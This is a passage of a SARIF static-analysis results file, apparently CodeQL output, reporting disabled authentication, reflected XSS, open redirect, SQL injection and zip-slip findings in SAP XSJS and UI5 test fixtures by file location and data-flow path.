disabled."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/xs-app.json","uriBaseId":"%SRCROOT%","index":640},"region":{"startLine":3,"startColumn":29,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"7c987b52e21935f7:1","primaryLocationStartColumnFingerprint":"24"}},{"ruleId":"js/xsjs-broken-authentication","rule":{"id":"js/xsjs-broken-authentication","index":0,"toolComponent":{"index":9}},"message":{"text":"Authentication should not be disabled."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/xs-app.json","uriBaseId":"%SRCROOT%","index":640},"region":{"startLine":15,"startColumn":35,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"f2aa90ab66c52c3c:1","primaryLocationStartColumnFingerprint":"22"}},{"ruleId":"js/xsjs-reflected-xss","rule":{"id":"js/xsjs-reflected-xss","index":1,"toolComponent":{"index":9}},"message":{"text":"Reflected XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":13,"startColumn":22,"endColumn":66}}}],"partialFingerprints":{"primaryLocationLineHash":"a31830db0e0a3d3c:1","primaryLocationStartColumnFingerprint":"19"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":11,"startColumn":29,"endColumn":68}},"message":{"text":"request ... eter1\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":11,"startColumn":7,"endColumn":26}},"message":{"text":"someParameterValue1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":13,"startColumn":46,"endColumn":65}},"message":{"text":"someParameterValue1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":3,"startColumn":34,"endColumn":51}},"message":{"text":"requestParameters"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":4,"startColumn":20,"endColumn":37}},"message":{"text":"requestParameters"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":4,"startColumn":10,"endColumn":48}},"message":{"text":"\"<div>\" ... </div>\""}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":13,"startColumn":22,"endColumn":66}},"message":{"text":"request ... Value1)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":11,"startColumn":29,"endColumn":68}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":11,"startColumn":29,"endColumn":68}}}]},{"ruleId":"js/xsjs-url-redirect","rule":{"id":"js/xsjs-url-redirect","index":2,"toolComponent":{"index":9}},"message":{"text":"[This URL](1) depends on a [user-provided value](2)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643},"region":{"startLine":9,"startColumn":38,"endColumn":56}}}],"partialFingerprints":{"primaryLocationLineHash":"f02e3e17e12824b3:1","primaryLocationStartColumnFingerprint":"35"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643},"region":{"startLine":7,"startColumn":28,"endColumn":66}},"message":{"text":"request ... meter\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643},"region":{"startLine":7,"startColumn":7,"endColumn":25}},"message":{"text":"someParameterValue"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643},"region":{"startLine":9,"startColumn":38,"endColumn":56}},"message":{"text":"someParameterValue"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643},"region":{"startLine":9,"startColumn":38,"endColumn":56}},"message":{"text":"This URL"}},{"id":2,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643},"region":{"startLine":7,"startColumn":28,"endColumn":66}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643},"region":{"startLine":7,"startColumn":28,"endColumn":66}}}]},{"ruleId":"js/xsjs-sql-injection","rule":{"id":"js/xsjs-sql-injection","index":3,"toolComponent":{"index":9}},"message":{"text":"This query depends on a [user-provided value](1).\nThis query depends on a [user-provided value](2)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":13,"startColumn":57,"endColumn":62}}}],"partialFingerprints":{"primaryLocationLineHash":"65aa43aa4e46559c:1","primaryLocationStartColumnFingerprint":"54"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":8,"startColumn":40,"endColumn":79}},"message":{"text":"request ... eter1\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":8,"startColumn":29,"endColumn":80}},"message":{"text":"JSON.pa ... ter1\"))"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":8,"startColumn":7,"endColumn":26}},"message":{"text":"someParameterValue1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":10,"startColumn":32,"endColumn":51}},"message":{"text":"someParameterValue1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":10,"startColumn":7,"endColumn":12}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":13,"startColumn":57,"endColumn":62}},"message":{"text":"query"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":9,"startColumn":40,"endColumn":79}},"message":{"text":"request ... eter2\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":9,"startColumn":29,"endColumn":80}},"message":{"text":"JSON.pa ... ter2\"))"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":9,"startColumn":7,"endColumn":26}},"message":{"text":"someParameterValue2"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":10,"startColumn":82,"endColumn":101}},"message":{"text":"someParameterValue2"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":10,"startColumn":7,"endColumn":12}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":13,"startColumn":57,"endColumn":62}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":8,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":2,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":9,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":8,"startColumn":40,"endColumn":79}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642},"region":{"startLine":9,"startColumn":40,"endColumn":79}}}]},{"ruleId":"js/xsjs-zip-slip","rule":{"id":"js/xsjs-zip-slip","index":4,"toolComponent":{"index":9}},"message":{"text":"The path of [this zip file](1) being saved depends on a [user-provided value](2).\nThe path of [this zip file](1) being saved depends on a [user-provided value](3).\nThe path of [this zip file](1) being saved depends on a [user-provided value](4).\nThe path of [this zip file](1) being saved depends on a [user-provided value](5).\nThe path of [this zip file](1) being saved depends on a [user-provided value](6).\nThe path of [this zip file](1) being saved depends on a [user-provided value](7).\nThe path of [this zip file](1) being saved depends on a [user-provided value](8).\nThe path of [this zip file](1) being saved depends on a [user-provided value](9).\nThe path of [this zip file](1) being saved depends on a [user-provided value](10).\nThe path of [this zip file](1) being saved depends on a [user-provided value](11).\nThe path of [this zip file](1) being saved depends on a [user-provided value](12).\nThe path of [this zip file](1) being saved depends on a [user-provided value](13).\nThe path of [this zip file](1) being saved depends on a [user-provided value](14).\nThe path of [this zip file](1) being saved depends on a [user-provided value](15).\nThe path of [this zip file](1) being saved depends on a [user-provided value](16).\nThe path of [this zip file](1) being saved depends on a [user-provided value](17).\nThe path of [this zip file](1) being saved depends on a [user-provided value](18).\nThe path of [this zip file](1) being saved depends on a [user-provided value](19).\nThe path of [this zip file](1) being saved depends on a [user-provided value](20).\nThe path of [this zip file](1) being saved depends on a [user-provided value](21).\nThe path of [this zip file](1) being saved depends on a [user-provided value](22).\nThe path of [this zip file](1) being saved depends on a [user-provided value](23).\nThe path of [this zip file](1) being saved depends on a [user-provided value](24).\nThe path of [this zip file](1) being saved depends on a [user-provided value](25).\nThe path of [this zip file](1) being saved depends on a [user-provided value](26).\nThe path of [this zip file](1) being saved depends on a [user-provided value](27).\nThe path of [this zip file](1) being saved depends on a [user-provided value](28).\nThe path of [this zip file](1) being saved depends on a [user-provided value](29).\nThe path of [this zip file](1) being saved depends on a [user-provided value](30).\nThe path of [this zip file](1) being saved depends on a [user-provided value](31).\nThe path of [this zip file](1) being saved depends on a [user-provided value](32).\nThe path of [this zip file](1) being saved depends on a [user-provided value](33).\nThe path of [this zip file](1) being saved depends on a [user-provided value](34).\nThe path of [this zip file](1) being saved depends on a [user-provided value](35).\nThe path of [this zip file](1) being saved depends on a [user-provided value](36).\nThe path of [this zip file](1) being saved depends on a [user-provided value](37).\nThe path of [this zip file](1) being saved depends on a [user-provided value](38).\nThe path of [this zip file](1) being saved depends on a [user-provided value](39).\nThe path of [this zip file](1) being saved depends on a [user-provided value](40).\nThe path of [this zip file](1) being saved depends on a [user-provided value](41).\nThe path of [this zip file](1) being saved depends on a [user-provided value](42).\nThe path of [this zip file](1) being saved depends on a [user-provided value](43).\nThe path of [this zip file](1) being saved depends on a [user-provided value](44).\nThe path of [this zip file](1) being saved depends on a [user-provided value](45)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":12,"startColumn":37,"endColumn":51}}}],"partialFingerprints":{"primaryLocationLineHash":"54d432c04bb48c9c:1","primaryLocationStartColumnFingerprint":"32"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}},"message":{"text":"jQuery. ... param\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":7,"startColumn":20,"endColumn":63}},"message":{"text":"new $.u ... ffer())"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":7,"startColumn":7,"endColumn":17}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":10,"startColumn":25,"endColumn":35}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":65,"endColumn":74}},"message":{"text":"entryPath"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":26,"endColumn":75}},"message":{"text":"require ... ryPath)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":9,"endColumn":23}},"message":{"text":"targetFilePath"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":12,"startColumn":37,"endColumn":51}},"message":{"text":"targetFilePath"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}},"message":{"text":"req.url"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":7,"startColumn":20,"endColumn":63}},"message":{"text":"new $.u ... ffer())"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":7,"startColumn":7,"endColumn":17}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":10,"startColumn":25,"endColumn":35}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":65,"endColumn":74}},"message":{"text":"entryPath"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":26,"endColumn":75}},"message":{"text":"require ... ryPath)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":9,"endColumn":23}},"message":{"text":"targetFilePath"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":12,"startColumn":37,"endColumn":51}},"message":{"text":"targetFilePath"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}},"message":{"text":"req.url"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":7,"startColumn":20,"endColumn":63}},"message":{"text":"new $.u ... ffer())"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":7,"startColumn":7,"endColumn":17}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":10,"startColumn":25,"endColumn":35}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":65,"endColumn":74}},"message":{"text":"entryPath"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":26,"endColumn":75}},"message":{"text":"require ... ryPath)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":9,"endColumn":23}},"message":{"text":"targetFilePath"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":12,"startColumn":37,"endColumn":51}},"message":{"text":"targetFilePath"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":18,"endColumn":38}},"message":{"text":"req2.params.category"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":7,"startColumn":20,"endColumn":63}},"message":{"text":"new $.u ... ffer())"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":7,"startColumn":7,"endColumn":17}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":10,"startColumn":25,"endColumn":35}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":65,"endColumn":74}},"message":{"text":"entryPath"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":26,"endColumn":75}},"message":{"text":"require ... ryPath)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":11,"startColumn":9,"endColumn":23}},"message":{"text":"targetFilePath"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":12,"startColumn":37,"endColumn":51}},"message":{"text":"targetFilePath"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644},"region":{"startLine":12,"startColumn":37,"endColumn":51}},"message":{"text":"this zip file"}},{"id":2,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}},"message":{"text":"user-provided value"}},{"id":3,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}},"message":{"text":"user-provided value"}},{"id":4,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}},"message":{"text":"user-provided value"}},{"id":5,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":18,"endColumn":38}},"message":{"text":"user-provided value"}},{"id":6,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}},"message":{"text":"user-provided value"}},{"id":7,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"id":8,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":34}},"message":{"text":"user-provided value"}},{"id":9,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"id":10,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":34}},"message":{"text":"user-provided value"}},{"id":11,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"id":12,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":17,"endColumn":34}},"message":{"text":"user-provided value"}},{"id":13,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js","uriBaseId":"%SRCROOT%","index":415},"region":{"startLine":6,"startColumn":18,"endColumn":26}},"message":{"text":"user-provided value"}},{"id":14,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js","uriBaseId":"%SRCROOT%","index":415},"region":{"startLine":6,"startColumn":49,"endColumn":57}},"message":{"text":"user-provided value"}},{"id":15,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":49,"endColumn":71}},"message":{"text":"user-provided value"}},{"id":16,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589},"region":{"startLine":10,"startColumn":49,"endColumn":64}},"message":{"text":"user-provided value"}},{"id":17,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":11,"startColumn":29,"endColumn":68}},"message":{"text":"user-provided value"}},{"id":18,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":11,"startColumn":29,"endColumn":50}},"message":{"text":"user-provided value"}},{"id":19,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641},"region":{"startLine":21,"startColumn":29,"endColumn":68}},"message":{"text":"user-provided 